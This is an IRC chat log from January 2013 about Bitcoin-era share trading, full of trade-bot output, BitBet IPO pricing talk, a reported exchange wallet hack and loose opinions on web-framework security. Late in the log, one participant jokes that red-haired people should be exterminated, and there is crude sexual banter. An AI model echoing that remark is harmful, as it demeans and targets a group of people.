06:45:14 most animals don;'t actually fight either Jan 11 06:45:16 they just dance Jan 11 06:45:20 yea Jan 11 06:57:29 [MPEX] [] @ BTC Jan 11 07:03:12 [MPEX] [S.DICE] 863 @ 0.00469636 = 4.053 BTC [+] Jan 11 07:03:12 [MPEX] [S.DICE] 887 @ 0.00472982 = 4.1954 BTC [+] Jan 11 07:17:03 [HAVELOCK] [HIM] 1 @ 13.5 BTC Jan 11 07:20:04 havelock? Jan 11 07:20:19 is this the personality that you added to assbot? Jan 11 07:20:54 Havelock and BTCT.co trades are reported here like MPEx now Jan 11 07:22:40 no, the personality has not been discovered yet Jan 11 07:23:12 anyway, 0.1337 to whoever finds where is it comming from. Jan 11 07:23:23 btc that is Jan 11 07:23:25 :) Jan 11 07:31:06 [MPEX] [TEST] 987654321 @ 1.23456789 = 1219326311.1264 BTC Jan 11 07:33:46 [MPEX] [S.MPOE] 1 @ 0.00063493 BTC [+] Jan 11 07:33:47 [MPEX] [S.MPOE] 1 @ 0.00063493 BTC [+] Jan 11 07:33:51 aha. Jan 11 07:36:22 [MPEX] [S.MPOE] 1 @ 0.00062769 BTC [-] Jan 11 07:37:39 [MPEX] [S.MPOE] 1 @ 0.00063493 BTC [+] Jan 11 07:37:40 [MPEX] [S.MPOE] 1 @ 0.00063493 BTC [+] Jan 11 07:48:01 Breaking News: In an unexpected turn of events, MPEx is the host of a record breaking trade totaling over the total amount of bitcoins in existance. In other news, a 1 cm asteroid is heading toward Earth, which might just kill everyone in an fiery apocalyptic scenario, as rendered by our artists in the following video... Jan 11 07:49:56 lol Jan 11 07:50:10 the above were tests related to switching to new assapi Jan 11 07:50:56 Hmm, nice name. ass-API Jan 11 07:50:56 which has occured smoothly and now we're on teh new interface. Jan 11 07:53:21 Is it the most impossibly complex to use API, plus you have to interact with it in Morse code? Jan 11 07:53:31 Hence "ass"api Jan 11 07:53:39 not rly. Jan 11 07:53:45 its just very sikrit Jan 11 07:54:01 Well assbot and his api doesn't desrve its name Jan 11 07:54:50 whats wrong? Jan 11 07:55:57 You can't call it assbot with its "ass"api if it's not being an ass, requiring very complex commands plus it has to be in Morse code. Jan 11 07:57:10 ass in the other sense. Jan 11 07:59:02 https://www.youtube.com/watch?v=i2mC04Rt35U#t=30 Jan 11 08:03:35 [MPEX] [S.DICE] 1250 @ 0.00472571 = 5.9071 BTC [-] Jan 11 08:03:36 [MPEX] [S.DICE] 250 @ 0.00472982 = 1.1825 BTC [+] Jan 11 08:22:53 [MPEX] [S.DICE] 1358 @ 0.00469654 = 6.3779 BTC [-] Jan 11 08:22:54 [MPEX] [S.DICE] 840 @ 0.00472982 = 3.973 BTC [+] Jan 11 08:22:56 [MPEX] [S.DICE] 468 @ 0.00475665 = 2.2261 BTC [+] Jan 11 08:27:25 [MPEX] [S.DICE] 1400 @ 0.00466298 = 6.5282 BTC [-] Jan 11 08:27:27 [MPEX] [S.DICE] 233 @ 0.00460859 = 1.0738 BTC [-] Jan 11 08:40:22 [MPEX] [S.DICE] 1700 @ 0.00460859 = 7.8346 BTC [-] Jan 11 08:46:17 [MPEX] [O.BTCUSD.P200T] 1000 @ 0.55700982 = 557.0098 BTC [-] Jan 11 08:46:28 [MPEX] [O.BTCUSD.P190T] 1000 @ 0.47889506 = 478.8951 BTC [-] Jan 11 09:01:11 [MPEX] [S.BBET] 50000 @ 0.00149 = 74.5 BTC [+] Jan 11 09:01:13 [MPEX] [S.BBET] 20000 @ 0.00169 = 33.8 BTC [+] Jan 11 09:01:14 [MPEX] [S.BBET] 6304 @ 0.00184312 = 11.619 BTC [+] Jan 11 09:01:15 [MPEX] [S.BBET] 10000 @ 0.00189842 = 18.9842 BTC [+] Jan 11 09:01:17 [MPEX] [S.BBET] 10000 @ 0.00195538 = 19.5538 BTC [+] Jan 11 09:03:51 !ticker m s.bbet Jan 11 09:03:53 [MPEX:S.BBET] 1D: 0.000337 / 0.00067495 / 0.0035 (1983593 shares, 1,338.84 BTC), 7D: 0.000337 / 0.00067495 / 0.0035 (1983593 shares, 1,338.84 BTC), 30D: 0.000337 / 0.00067495 / 0.0035 (1983593 shares, 1,338.84 BTC) Jan 11 09:04:04 fuck off by a bitcoin! Jan 11 09:04:50 eh Jan 11 09:05:29 [MPEX] [S.MPOE] 2596 @ 0.00063493 = 1.6483 BTC [+] Jan 11 09:05:31 [MPEX] [S.MPOE] 9889 @ 0.00063734 = 6.3027 BTC [+] Jan 11 09:05:32 [MPEX] [S.MPOE] 19427 @ 0.00064096 = 12.4519 BTC [+] Jan 11 09:05:33 [MPEX] [S.MPOE] 7013 @ 0.00064793 = 4.5439 BTC [+] Jan 11 09:05:35 [MPEX] [S.MPOE] 20329 @ 0.00065153 = 13.245 BTC [+] Jan 11 09:05:35 [MPEX] [S.MPOE] 21529 @ 0.00065605 = 14.1241 BTC [+] Jan 11 09:05:36 [MPEX] [S.MPOE] 2217 @ 0.00065629 = 1.455 BTC [+] Jan 11 09:05:37 [MPEX] [S.MPOE] 28355 @ 0.00065675 = 18.6221 BTC [+] Jan 11 09:05:38 [MPEX] [S.MPOE] 11320 @ 0.00065997 = 7.4709 BTC [+] Jan 11 09:05:40 [MPEX] [S.MPOE] 8968 @ 0.00065998 = 5.9187 BTC [+] Jan 11 09:05:41 [MPEX] [S.MPOE] 1000 @ 0.00065999 = 0.66 BTC [+] Jan 11 09:05:42 obviously i meant fuck! off by a bitcoin! Jan 11 09:05:42 [MPEX] [S.MPOE] 21732 @ 0.00065999 = 14.3429 BTC [+] Jan 11 09:05:43 [MPEX] [S.MPOE] 45625 @ 0.00066 = 30.1125 BTC [+] Jan 11 09:06:16 [BTCTC] [COGNITIVE] 7 @ 0.46 = 3.22 BTC Jan 11 09:08:29 anyway this is all too much excitement for one day. Jan 11 09:08:32 catch you all later. **** BEGIN LOGGING AT Fri Jan 11 19:47:42 2013 Jan 11 19:48:22 !ticker m s.bbet Jan 11 19:48:24 [MPEX:S.BBET] 1D: 0.000337 / 0.00067662 / 0.0035 (1986093 shares, 1,343.84 BTC), 7D: 0.000337 / 0.00067662 / 0.0035 (1986093 shares, 1,343.84 BTC), 30D: 0.000337 / 0.00067662 / 0.0035 (1986093 shares, 1,343.84 BTC) Jan 11 19:48:42 awww, no collapse ? Jan 11 19:49:09 nope Jan 11 19:52:52 [BTCTC] [ESECURITYSABTC] 1 @ 0.74 BTC [-] Jan 11 19:59:31 well honestly fuck this, i didn't even get to buy shares Jan 11 20:06:03 [BTCTC] [ESECURITYSABTC] 2 @ 0.72 = 1.44 BTC [-] Jan 11 20:06:30 why people try to make those ID's so COOL ??? Jan 11 20:06:32 "cool" Jan 11 20:09:43 mircea_popescu: whut? eheh Jan 11 20:10:02 Wanted to buy yourself a personal stack of your own stock? Jan 11 20:10:05 well sure. Jan 11 20:10:23 Fine enough Jan 11 20:11:03 i just wasn't prepared for 60s Jan 11 20:12:17 thought it wouldn't raise to that point so fast? I didn't either =/ Jan 11 20:13:08 I thought people would buy more progressively as BitBet shows it can bring a cashflow. Jan 11 20:13:27 Too many orders coming in last moment Jan 11 20:13:35 right. Jan 11 20:13:47 Literally last minute =/ Jan 11 20:14:28 [MPEX] [S.DICE] 900 @ 0.00463951 = 4.1756 BTC [-] Jan 11 20:15:06 or second Jan 11 20:18:43 Or after the last second Jan 11 20:18:54 while the blocks were still popping off Jan 11 20:19:08 Sold some at 200000 now ;) Jan 11 20:19:17 [MPEX] [S.DICE] 3850 @ 0.004765 = 18.3453 BTC [+] Jan 11 20:20:04 I wonder how much of this is that there is more capital available than viable securities to invest in... Jan 11 20:21:13 Bugpowder blocks came up +1 seconds each Jan 11 20:21:22 not same second as i erroneously indicated at the time Jan 11 20:21:22 yes Jan 11 20:21:29 I got ur message Jan 11 20:21:35 I saw it Jan 11 20:21:36 a ok Jan 11 20:21:44 and placed a buy order for up to 100000 Jan 11 20:21:45 so yeah. this quite deliberately actually Jan 11 20:21:50 to allow for the exact sort of thing Jan 11 20:21:53 yeah its better that way actaully Jan 11 20:21:54 then i promptly forgot all about it Jan 11 20:21:56 i know lol Jan 11 20:21:57 [MPEX] [S.DICE] 21998 @ 0.004765 = 104.8205 BTC [+] Jan 11 20:21:58 [MPEX] [S.DICE] 1073 @ 0.00476524 = 5.1131 BTC [+] Jan 11 20:22:00 [MPEX] [S.DICE] 2100 @ 0.00476551 = 10.0076 BTC [+] Jan 11 20:22:01 [MPEX] [S.DICE] 508 @ 0.00476576 = 2.421 BTC [+] Jan 11 20:22:01 wow Jan 11 20:22:02 [MPEX] [S.DICE] 265 @ 0.00476624 = 1.2631 BTC [+] Jan 11 20:22:03 [MPEX] [S.DICE] 1349 @ 0.00476669 = 6.4303 BTC [+] Jan 11 20:22:04 [MPEX] [S.DICE] 626 @ 0.0047679 = 2.9847 BTC [+] Jan 11 20:22:05 [MPEX] [S.DICE] 1100 @ 0.0047681 = 5.2449 BTC [+] Jan 11 20:22:06 [MPEX] [S.DICE] 5650 @ 0.00476816 = 26.9401 BTC [+] Jan 11 20:22:08 [MPEX] [S.DICE] 2600 @ 0.00477036 = 12.4029 BTC [+] Jan 11 20:22:09 [MPEX] [S.DICE] 1150 @ 0.0047705 = 5.4861 BTC [+] Jan 11 20:22:10 [MPEX] [S.DICE] 750 @ 0.00477212 = 3.5791 BTC [+] Jan 11 20:22:11 [MPEX] [S.DICE] 2050 @ 0.0047744 = 9.7875 BTC [+] Jan 11 20:22:12 [MPEX] [S.DICE] 2108 @ 0.00477495 = 10.0656 BTC [+] Jan 11 20:22:12 o hey some movement Jan 11 20:22:14 [MPEX] [S.DICE] 1600 @ 0.00477596 = 7.6415 BTC [+] Jan 11 20:22:15 [MPEX] [S.DICE] 1650 @ 0.00477701 = 7.8821 BTC [+] Jan 11 20:22:16 [MPEX] [S.DICE] 6150 @ 0.00477767 = 29.3827 BTC [+] Jan 11 20:22:16 [MPEX] [S.DICE] 2900 @ 0.00477977 = 13.8613 BTC [+] Jan 11 20:22:17 [MPEX] [S.DICE] 2700 @ 0.00478012 = 12.9063 BTC [+] Jan 11 20:22:18 [MPEX] [S.DICE] 1050 @ 0.00478558 = 5.0249 BTC [+] Jan 11 20:22:19 [MPEX] [S.DICE] 1550 @ 0.00478566 = 7.4178 BTC [+] Jan 11 20:22:20 [MPEX] [S.DICE] 400 @ 0.00478655 = 1.9146 BTC [+] Jan 11 20:22:21 [MPEX] [S.DICE] 1050 @ 0.00478722 = 5.0266 BTC [+] Jan 11 20:22:22 [MPEX] [S.DICE] 1400 @ 0.00478844 = 6.7038 BTC [+] Jan 11 20:22:23 [MPEX] [S.DICE] 2900 @ 0.0047894 = 13.8893 BTC [+] Jan 11 20:22:25 [MPEX] [S.DICE] 352 @ 0.00478999 = 1.6861 BTC [+] Jan 11 20:22:26 [MPEX] [S.DICE] 2400 @ 0.00479245 = 11.5019 BTC [+] Jan 11 20:22:27 [MPEX] [S.DICE] 2800 @ 0.00479292 = 13.4202 BTC [+] Jan 11 20:22:28 [MPEX] [S.DICE] 1371 @ 0.00479303 = 6.5712 BTC [+] Jan 11 20:22:28 will the 480000 go? Jan 11 20:22:28 [MPEX] [S.DICE] 2200 @ 0.00479344 = 10.5456 BTC [+] Jan 11 20:22:29 [MPEX] [S.DICE] 609 @ 0.00479569 = 2.9206 BTC [+] Jan 11 20:22:30 [MPEX] [S.DICE] 150 @ 0.00479729 = 0.7196 BTC [+] Jan 11 20:22:31 [MPEX] [S.DICE] 77441 @ 0.0048 = 371.7168 BTC [+] Jan 11 20:22:36 nope Jan 11 20:22:36 not bad Jan 11 20:22:47 part of them Jan 11 20:23:02 I picked the wrong morning to reduce S.DICE exposure to 1000 coins :-P Jan 11 20:23:07 or maybe the right morning Jan 11 20:23:25 :p Jan 11 20:23:26 how much was that? Jan 11 20:23:30 like 500 ? Jan 11 20:23:37 800 Jan 11 20:23:38 maybe Jan 11 20:24:06 about 750 Jan 11 20:24:07 looks like Jan 11 20:24:11 a ok Jan 11 20:24:32 !ticker S.DICE Jan 11 20:24:33 Provide exchange and ticker. Jan 11 20:24:39 !ticker MPEX S.DICE Jan 11 20:24:41 [MPEX:S.DICE] 1D: 0.00453297 / 0.00470258 / 0.0048 (383687 shares, 1,804.32 BTC), 7D: 0.00382726 / 0.00464745 / 0.0048 (1905911 shares, 8,857.63 BTC), 30D: 0.0014 / 0.00347773 / 0.0048 (14777786 shares, 51,393.26 BTC) Jan 11 20:24:47 !ticker MPEX S.BBET Jan 11 20:24:48 [MPEX:S.BBET] 1D: 0.000337 / 0.00067662 / 0.0035 (1986093 shares, 1,343.84 BTC), 7D: 0.000337 / 0.00067662 / 0.0035 (1986093 shares, 1,343.84 BTC), 30D: 0.000337 / 0.00067662 / 0.0035 (1986093 shares, 1,343.84 BTC) Jan 11 20:25:35 you can do Jan 11 20:25:41 !ticker m s.bbet Jan 11 20:25:43 [MPEX:S.BBET] 1D: 0.000337 / 0.00067662 / 0.0035 (1986093 shares, 1,343.84 BTC), 7D: 0.000337 / 0.00067662 / 0.0035 (1986093 shares, 1,343.84 BTC), 30D: 0.000337 / 0.00067662 / 0.0035 (1986093 shares, 1,343.84 BTC) Jan 11 20:25:46 ah Jan 11 20:30:30 ;;ticker Jan 11 20:30:31 BTCUSD ticker | Best bid: 14.18263, Best ask: 14.23000, Bid-ask spread: 0.04737, Last trade: 14.18263, 24 hour volume: 36797.61600636, 24 hour low: 13.87150, 24 hour high: 14.29999, 24 hour vwap: 14.09426 Jan 11 20:36:34 so over 14 Jan 11 20:49:19 [MPEX] [S.BBET] 1000 @ 0.002 = 2 BTC [+] Jan 11 20:50:05 Too damn expansive... Jan 11 20:50:12 expensive* Jan 11 20:50:23 well, both are appropriate I guess... Jan 11 20:50:58 [MPEX] [S.BBET] 3000 @ 0.002 = 6 BTC [+] Jan 11 20:52:20 !ticker MPEX S.BBET Jan 11 20:52:21 [MPEX] [S.DICE] 1850 @ 0.00472828 = 8.7473 BTC [-] Jan 11 20:52:23 [MPEX:S.BBET] 1D: 0.000337 / 0.00067928 / 0.0035 (1990093 shares, 1,351.84 BTC), 7D: 0.000337 / 0.00067928 / 0.0035 (1990093 shares, 1,351.84 BTC), 30D: 0.000337 / 0.00067928 / 0.0035 (1990093 shares, 1,351.84 BTC) Jan 11 20:53:56 [MPEX] [S.DICE] 2821 @ 0.00470237 = 13.2654 BTC [-] Jan 11 20:54:41 [MPEX] [S.BBET] 1000 @ 0.002 = 2 BTC [+] Jan 11 20:55:27 so did btcforum go away ? Jan 11 20:56:16 0.002 values BitBet at 20 000 BTC Jan 11 20:57:36 yeah Jan 11 20:57:46 yeah Jan 11 20:57:51 _sick stupid_ Jan 11 20:58:00 To get that on 1% fee, it would require 2 000 000 in bets. I'd have though people would wait to get more reports/info on advertising revenue and other variables. Jan 11 20:58:03 dude lay off. there's no start-up in this world valued under 1mn Jan 11 20:58:11 20k btc is way under that. 75% discount or some shit. Jan 11 20:58:34 go tell me about airbnb instead Jan 11 20:58:52 what, just because this is a public venue and graham does his shit behind closed doors i have to be stuck with all the unwashed public ?! Jan 11 20:59:22 The first block for 0.00001 or 100 BTC valuation was underpriced. Jan 11 20:59:32 seems that way. Jan 11 20:59:48 But people overbought BBET at 0.002 BTC Jan 11 20:59:50 that block sold for at least 55000 Jan 11 20:59:55 maybe higher Jan 11 21:00:01 35000 i think Jan 11 21:00:32 [MPEX] [S.DICE] 2200 @ 0.00464742 = 10.2243 BTC [-] Jan 11 21:00:34 [MPEX] [S.DICE] 950 @ 0.00456242 = 4.3343 BTC [-] Jan 11 21:00:36 Even when accounting potential growth, it's high as heck. Jan 11 21:00:38 Namworld correction, people are RIGHT NOW "overbuying" at 0.002 Jan 11 21:00:44 so, the part where the 1k block was undervalued is a fact : it sold for 35x that. Jan 11 21:00:52 the part where people overbought is speculation Jan 11 21:00:59 i thought they overbought yest at 150 Jan 11 21:01:07 the first block sold for 35?? Jan 11 21:01:13 Well 35x that was nicely priced in my opinion. 3500 BTC valuation. Jan 11 21:01:19 high bid was at least 55000 at the open Jan 11 21:01:23 well would have had to Bugpowder seeing how there's no sales under 35 on record ? Jan 11 21:01:29 o right you are. Jan 11 21:01:39 i was just going by the min/max Jan 11 21:01:50 I think someone placed an even higher one right before the open Jan 11 21:01:54 but yeah. 55 or something yeah Jan 11 21:02:01 and it sold though down to 35 Jan 11 21:02:05 yeah. Jan 11 21:02:14 I had 1,000,000 at 33000 Jan 11 21:02:16 :( Jan 11 21:02:56 I had 500k just over the 1 million at 27000 Jan 11 21:03:04 then poof, tons of bids over it Jan 11 21:03:22 i had some bids in too, but i never got anything. Jan 11 21:03:31 so i guess we're three pods in a piggy. Jan 11 21:03:45 i'm ok Jan 11 21:03:54 people keep buying my 200 ask :) Jan 11 21:04:02 thinking of raising it to 250 Jan 11 21:04:08 before it sells through Jan 11 21:04:09 im not so ok seeing how i sold 8% of a company for like 500 btc. Jan 11 21:04:11 but a well! Jan 11 21:04:48 you should have done an angle round first Jan 11 21:04:52 Class 6 Jan 11 21:05:02 angel Jan 11 21:05:13 ya well i wanted to try this thing out. Jan 11 21:05:32 figured, well fuck it, these fud idiots will prolly burn it into the ground, i buy it all out and we go from there. Jan 11 21:05:40 seems forum != mpex. Jan 11 21:05:48 duh, in retrospect. Jan 11 21:06:30 so you'd basically pay the price to get 100% on those shares + half of sales proceed... Jan 11 21:06:52 and kako gets the other half... or whatever the ratio is. Jan 11 21:08:32 sure. Jan 11 21:08:47 Today at 12:24:00 PM #1 Jan 11 21:08:47 We sadly need to announce that our wallet has been compromised thus DO NOT send any further funds to any of the coin wallets, BTC, DVC, LTC, etc. We will setup a new wallet and reset all the addresses. This will most likely take the whole weekend. Jan 11 21:08:49 duh Jan 11 21:09:00 CRYPTOSTOCKS !!! IMPORTANT Jan 11 21:09:06 VICUREX Jan 11 21:09:13 are these the same thing? Jan 11 21:09:17 yes Jan 11 21:09:22 oh Jan 11 21:09:23 ok Jan 11 21:09:35 idiots using ruby on rails Jan 11 21:10:05 jesus fuck the warnings were all over the place Jan 11 21:10:07 "i dont know how to make a site, so ill quick prototype a site with ror and then launch it live" Jan 11 21:10:13 even send the girl to warn those bitcoinica redux idiot Jan 11 21:10:14 s Jan 11 21:10:32 didn't want to carpetbomb everyone. Jan 11 21:11:16 "o no, why is MPEx not more like modern!!1" pssshhhh Jan 11 21:11:40 security through obscurity ? Jan 11 21:11:47 =)~ Jan 11 21:11:56 security through 1994 web dev skillz Jan 11 21:12:11 err sorry web _design_ skillz Jan 11 21:12:19 i have no problems with the functionality :) Jan 11 21:12:29 topace security through not running ANY code that's unread. Jan 11 21:12:47 you know ? absolute minimum requirement for any level of security whatsoever, Jan 11 21:12:51 "each line of code was read" Jan 11 21:12:57 indeed Jan 11 21:12:59 right. Jan 11 21:13:01 havelock doesnt use any outside libraries Jan 11 21:13:05 or frameworks Jan 11 21:13:09 its all internal Jan 11 21:13:11 well people on ror probably do. i would guess. dunno. Jan 11 21:13:15 [MPEX] [S.DICE] 879 @ 0.00465808 = 4.0945 BTC [+] Jan 11 21:13:18 maybe they did read it , audited it all etc. Jan 11 21:13:42 someone said it was a RoR exploit Jan 11 21:13:51 no clue Jan 11 21:13:59 JWU_42 ror was blown right wide open 2 days ago. Jan 11 21:14:31 i saw another bitcoin site pop up using drupal and just laughed, just waiting to get hacked, i know cavirtex uses django too, not too sure about its security vulns.. but using any sort of framework tha tother people wrote, and trusting it blindly, is a _bad_ idea Jan 11 21:14:36 to go with the java exploit last year Jan 11 21:14:40 (and a new one just announced) Jan 11 21:15:00 topace especially because they wrote it for an entirely different purpose. Jan 11 21:15:15 the django devs didn't proceed with "let us write code that shall be used to handle btc payments" Jan 11 21:15:35 it was more like "let's write some stuff so all these idiots quit programming in myspace" Jan 11 21:15:44 haha Jan 11 21:16:28 yeah - that is what I heard Jan 11 21:16:46 so not sure if people are guessing based on the RoR news or what Jan 11 21:17:02 o you mean re cryptostocks ? Jan 11 21:17:07 yes Jan 11 21:17:15 yeah. me either. would be nice if the peeps would make more useful posts announcing stuff Jan 11 21:17:30 you should read cablepair's stuff sometime. two pages, nothing there. Jan 11 21:18:03 that idiot with the "small majority" what's his name Jan 11 21:18:19 at least he explained intelligibly what had happened. Jan 11 21:19:21 jurov what obscure stuff do you use ? Jan 11 21:19:39 turbogears Jan 11 21:19:43 http://www.cvedetails.com/vendor/11207/Turbogears.html Jan 11 21:20:39 that's the google python thing ? Jan 11 21:21:35 it's in python but not from google Jan 11 21:24:35 "All else equal, having 1% of a company is better than having 0.5%. But the 100th employee at Google did much better than the average venture-backed CEO did in the last decade.  " Jan 11 21:27:02 btw, PHP had 15 "code execution" type vulns. python 0. Jan 11 21:27:08 in last 4 years Jan 11 21:29:10 java had 3 Jan 11 21:29:17 interesting Jan 11 21:32:37 Bugpowder good point there Jan 11 21:33:00 jurov php is used about 10`000 more than python for web apps. Jan 11 21:33:12 consequently, the figures to compare are 15 with 5000 Jan 11 21:33:22 which is the average between 0 and 1 multiplied with 10k Jan 11 21:34:57 10000 times more? sauce? Jan 11 21:35:17 no sauce, but you get the idea. Jan 11 21:36:46 i don't get the idea, sry. in all programming langs popularity reviews py is not so far behind Jan 11 21:37:18 crawl the web, count by domain whether it runs py or php Jan 11 21:37:38 "popularity reviews", what's that ? Jan 11 21:37:47 asking people whether they can name python ? of fucking course they can. Jan 11 21:40:06 [HAVELOCK] [SDICE] 25 @ 0.48 = 12 BTC [-] Jan 11 21:41:20 php is just so much more visible cause everyone leaves the .php extension visible Jan 11 21:42:08 surely someone did the crawl but can't find anything like it Jan 11 21:42:25 maybe that's true Jan 11 21:42:33 thing is, if pphp extension is visible that is all we need. Jan 11 21:42:42 cause you can own php once it's there, makes no diff if used much or not. Jan 11 21:44:09 but anyway, this isn't an indictment of python in any way Jan 11 21:44:10 TIOBE counts search engine queries, py has 4.173% ,PHP 5.546%. Jan 11 21:44:17 just illustrating how risk assesments are carried out. Jan 11 21:44:44 how often something is used also matters, simple reported vuln count by itself is meaningless. Jan 11 21:45:30 i agree PHP is used much more. Jan 11 21:46:05 but from my own experience, python makes it harder to open a gaping hole Jan 11 21:47:05 php feels like hack on hack Jan 11 21:47:14 so then go with python, i see no problem there. Jan 11 21:47:22 educated guesses is how we stay afloat. Jan 11 21:48:00 at least you didn't go with microsoft. cause ITS TEH STANDARD Jan 11 21:48:03 :D Jan 11 21:48:10 me ?! lol Jan 11 21:51:58 php is unmaintainable Jan 11 21:52:26 python runs slow Jan 11 21:52:32 take your pick Jan 11 21:52:51 ;;ticker Jan 11 21:52:52 BTCUSD ticker | Best bid: 14.17214, Best ask: 14.21998, Bid-ask spread: 0.04784, Last trade: 14.17214, 24 hour volume: 33873.76920876, 24 hour low: 13.87150, 24 hour high: 14.26133, 24 hour vwap: 14.08706 Jan 11 21:53:46 ah those damn stereotypes Jan 11 21:54:52 http://benchmarksgame.alioth.debian.org/u32/which-programs-are-fastest.php lists php with score 40.89 , py 53.43 Jan 11 21:55:16 not so bad Jan 11 21:56:48 [MPEX] [S.DICE] 1700 @ 0.00471799 = 8.0206 BTC [+] Jan 11 21:56:57 that graph shows php to be slightly faster, with a huge berth. Jan 11 21:57:14 most php code runs faster than most py code simply because most programmers are idiots. Jan 11 21:57:59 it not about me wanting to evangelize python Jan 11 21:58:06 i just wonder - am i the only one who tries to find out some real numbers when talking about programming langs? Jan 11 21:58:12 yes. Jan 11 21:58:22 especially because the topic is so complex real numbers can not be found./ Jan 11 21:58:34 [MPEX] [S.DICE] 771 @ 0.00471799 = 3.6376 BTC [+] Jan 11 21:58:35 [MPEX] [S.DICE] 279 @ 0.00456242 = 1.2729 BTC [-] Jan 11 21:59:16 so we shall stick to vague impressions. i see. Jan 11 22:01:03 hey, it worked fine for the past 50 years Jan 11 22:01:12 by now it's tradition Jan 11 22:01:28 haha Jan 11 22:01:57 Most Online Today: 1828 Jan 11 22:02:06 did bitcoin catch some big news or something ? Jan 11 22:03:23 http://www.google.com/trends/explore#q=buy%20bitcoins&cmpt=q almost all time high Jan 11 22:03:36 lol, again my damn numbers Jan 11 22:05:17 i think you weigh about the same as a duck. Jan 11 22:05:45 http://www.google.com/trends/explore#q=trilema&cmpt=q Jan 11 22:05:47 haha cool. Jan 11 22:07:06 mircea, notice the map Jan 11 22:07:13 http://www.google.com/trends/explore#q=mpex&cmpt=q Jan 11 22:07:15 ahahaha! Jan 11 22:07:18 SELL OUT!!1 Jan 11 22:08:07 jurov re bitcoin : of course it's heaviest in yupr :D Jan 11 22:08:23 no i was talking about trilema Jan 11 22:08:29 http://www.google.com/trends/explore#q=mircea%20popescu&cmpt=q Jan 11 22:08:47 what you did in dec 2009? Jan 11 22:09:32 launched it. Jan 11 22:09:47 no wait that was 31 dec 2008 Jan 11 22:09:49 hm Jan 11 22:10:26 i have no idea. maybe some political stuff. Jan 11 22:14:12 [MPEX] [S.DICE] 2364 @ 0.00472325 = 11.1658 BTC [+] Jan 11 22:15:05 [HAVELOCK] [SDICE] 15 @ 0.48 = 7.2 BTC [-] Jan 11 22:23:58 mircea_popescu: Hi , do you know if there any way to move S.DICE stocks to another mpex account? Jan 11 22:24:29 PUSH Jan 11 22:24:32 it's documented in the faq. Jan 11 22:29:48 [MPEX] [S.DICE] 2900 @ 0.004583 = 13.2907 BTC [-] Jan 11 22:33:24 [BTCTC] [BASIC-MINING] 21 @ 0.33 = 6.93 BTC Jan 11 22:33:37 mircea, if you look at searched term, most of the searches for MPEx is for another kind of MPEx. Jan 11 22:34:29 Namworld i know, was just poking fun Jan 11 22:34:34 So searches for your actually exchange might be on the rise, but represent a fraction of all stuff tagged with the acronym MPEX searched for. Jan 11 22:34:53 I wonder how much of those searches are for the actual exchange tho Jan 11 22:35:11 i don't tbh Jan 11 22:35:51 ;;bc,blocks Jan 11 22:35:52 216160 Jan 11 22:36:18 ;;bc,bollocks Jan 11 22:36:19 Error: "bc,bollocks" is not a valid command. Jan 11 22:36:22 sorry, it had to be done. Jan 11 22:36:23 "blocks" : 187949, Jan 11 22:36:45 bitcoin: a little boy waits Jan 11 22:42:40 [MPEX] [S.DICE] 1600 @ 0.00456242 = 7.2999 BTC [-] Jan 11 22:47:35 [MPEX] [S.DICE] 2917 @ 0.00456242 = 13.3086 BTC [-] Jan 11 22:47:57 ;;seen smickles Jan 11 22:47:57 smickles was last seen in #bitcoin-assets 1 day, 2 hours, 25 minutes, and 27 seconds ago: ;;ticker Jan 11 22:49:35 smickitysmickles Jan 11 22:50:45 hey, that's actually a long time for hi, Jan 11 22:50:47 him* Jan 11 22:51:56 i bet a monster ate him Jan 11 22:52:14 ya, aged 2 Jan 11 22:52:19 probably a flying spaghetti monster if I had to guess Jan 11 22:52:25 oh even deadlier Jan 11 22:53:12 so i waited 8 months to register some new gpu's Jan 11 22:53:20 which had 2 year warranties Jan 11 22:53:44 i've had to RMA one and now another card twice Jan 11 22:53:58 I'm wondering how long this warranty lasts Jan 11 22:55:32 till the end of rma Jan 11 22:56:05 [MPEX] [S.DICE] 750 @ 0.00456937 = 3.427 BTC [+] Jan 11 22:56:49 I rma'd a few cards before I learned not to run fans >80% Jan 11 22:57:43 Bitcoin: The Video Game Jan 11 22:57:46 they never even looked at receipts, so used to dishing out new ones Jan 11 22:57:50 who would buy it? Jan 11 22:58:51 if blizzard publishes it, many peopkle. Jan 11 22:59:05 [HAVELOCK] [SDICE] 20 @ 0.48 = 9.6 BTC [-] Jan 11 22:59:22 its like a vidya game with no steam Jan 11 22:59:58 ships by boat in three weeks Jan 11 23:01:05 i am steam account without Jan 11 23:01:16 old school Jan 11 23:02:11 if steam worked on bitcoin blockchain the next version would be out before the game downloaded Jan 11 23:21:04 if steam used btc i might give it a try. Jan 11 23:35:15 i just used my leftover amazon balance to buy sex toys Jan 11 23:35:22 am i ok? Jan 11 23:35:33 sure Jan 11 23:35:41 it felt normal Jan 11 23:35:48 if you say so Jan 11 23:35:54 as long as theres a rubber fist Jan 11 23:36:03 i almost got that Jan 11 23:36:07 i saw the rubber fist Jan 11 23:36:17 [MPEX] [S.DICE] 1500 @ 0.00456937 = 6.8541 BTC [+] Jan 11 23:36:18 I bought one Jan 11 23:36:18 [MPEX] [S.DICE] 900 @ 0.00458215 = 4.1239 BTC [+] Jan 11 23:36:27 as a present for my boss Jan 11 23:36:34 $100 goes a long way on amazon Jan 11 23:36:37 let me tell you Jan 11 23:36:40 cost like $300 Jan 11 23:36:44 i have a whole box of dildos coming Jan 11 23:37:22 just dont mistake them for your parachute bag Jan 11 23:38:05 [HAVELOCK] [SDICE] 5 @ 0.48 = 2.4 BTC [-] Jan 11 23:38:08 (ref http://www.imdb.com/title/tt1092633/) Jan 11 23:38:53 [MPEX] [S.DICE] 1000 @ 0.00458215 = 4.5822 BTC [+] Jan 11 23:39:21 [MPEX] [S.DICE] 350 @ 0.00458215 = 1.6038 BTC [+] Jan 11 23:41:56 http://www.youtube.com/watch?v=UlWrmIqGs3Y Jan 11 23:44:28 etf is wrong with his phone? Jan 11 23:44:32 wtf* Jan 11 23:45:05 is he shooting that on a nokia? Jan 11 23:46:00 micon is numer one troll Jan 11 23:47:58 he's a pretty shit troll tbh Jan 11 23:48:05 also ginger Jan 11 23:48:55 theres really no point in letting gingers live, we should help evolution along and just exterimate them now Jan 11 23:49:54 haha Jan 11 23:51:43 tim minchin - prejudice Jan 11 23:51:49 ? Jan 11 23:51:55 oh its quitting time Jan 11 23:51:57 im outta here Jan 11 23:54:17 etf is wrong with his phone? << he was ranting about his speen Jan 11 23:54:19 cause of that phone Jan 11 23:54:36 also, he proposes his anamicon daughter (a ginger ?) Jan 11 23:54:39 will lead all of bitcoin Jan 11 23:58:27 inaba is pretty ruthless to him Jan 11 23:58:46 i'm not sure if i would be nice, depends on what was cut out of the 